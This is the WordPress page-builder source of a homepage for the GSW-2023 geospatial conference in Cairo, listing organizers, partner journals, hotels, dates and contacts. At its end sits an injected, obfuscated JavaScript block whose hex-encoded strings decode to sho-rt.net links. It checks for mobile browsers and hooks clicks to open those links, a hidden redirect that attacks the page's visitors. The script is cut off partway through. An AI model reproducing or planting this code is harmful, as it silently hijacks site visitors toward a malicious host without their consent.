18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 